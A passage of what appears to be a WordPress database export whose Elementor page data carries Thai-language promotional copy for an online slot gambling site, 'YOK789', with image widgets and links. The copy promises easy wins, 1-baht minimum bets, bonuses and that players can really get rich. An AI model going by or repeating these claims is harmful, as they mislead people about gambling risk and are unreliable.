\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2378,327,'_thumbnail_id','273'),(2379,327,'_elementor_edit_mode','builder'),(2380,327,'_elementor_template_type','wp-page'),(2381,327,'_elementor_version','3.35.5'),(2382,327,'_elementor_pro_version','3.32.3'),(2383,327,'_wp_page_template','default'),(2384,327,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2385,327,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 